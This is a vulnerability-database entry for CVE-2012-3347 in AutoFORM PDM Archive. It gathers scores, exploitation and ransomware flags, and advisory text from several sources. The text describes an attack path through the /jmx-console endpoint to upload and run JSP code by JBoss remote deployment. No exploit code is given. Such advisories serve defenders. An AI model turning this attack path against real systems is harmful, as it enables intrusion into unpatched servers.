CVE-2012-3347
published 2012-06-13CVE-2012-3347: AutoFORM PDM Archive before 7.0 implements user accounts in a way that allows for JMX Console authentication, which allows remote authenticated users to bypass…
PriorityP179medium6CVSS 2.0
AVNACMAuSCPIPAP
ITWVulnCheck KEVRansomware
Exploited in the wild
EPSS
1.54%
71.9th percentile
AutoFORM PDM Archive before 7.0 implements user accounts in a way that allows for JMX Console authentication, which allows remote authenticated users to bypass intended access restrictions via the /jmx-console URI, and then upload and execute arbitrary JSP code via a JBoss remote-deployment mechanism, a different vulnerability than CVE-2012-1828.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efstechnology | autoform_pdm_archive | <= 6.920 | — |
| efstechnology | autoform_pdm_archive | — | — |
CVSS provenance
nvdv2.06.0MEDIUMAV:N/AC:M/Au:S/C:P/I:P/A:P
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c8cc-954v-xv37: AutoFORM PDM Archive before 7
ghsa_unreviewed·2022-05-17·CVSS 6.5
CVE-2012-3347 [MEDIUM] GHSA-c8cc-954v-xv37: AutoFORM PDM Archive before 7
AutoFORM PDM Archive before 7.0 implements user accounts in a way that allows for JMX Console authentication, which allows remote authenticated users to bypass intended access restrictions via the /jmx-console URI, and then upload and execute arbitrary JSP code via a JBoss remote-deployment mechanism, a different vulnerability than CVE-2012-1828.
VulnCheck
AutoFORM PDM Archive before 7.0 Remote Security Bypass
vulncheck·2012·CVSS 6.5
CVE-2012-3347 [MEDIUM] AutoFORM PDM Archive before 7.0 Remote Security Bypass
AutoFORM PDM Archive before 7.0 Remote Security Bypass
AutoFORM PDM Archive before 7.0 implements user accounts in a way that allows for JMX Console authentication, which allows remote authenticated users to bypass intended access restrictions via the /jmx-console URI, and then upload and execute arbitrary JSP code via a JBoss remote-deployment mechanism, a different vulnerability than CVE-2012-1828.
Affected: efstechnology autoform_pdm_archive
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://nsarchive.gwu.edu/sites/default/files/documents/5986978/National-Security-Archive-Department-of-Justice.pdf; https://www
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2012-06-13
Published
Exploited in the wild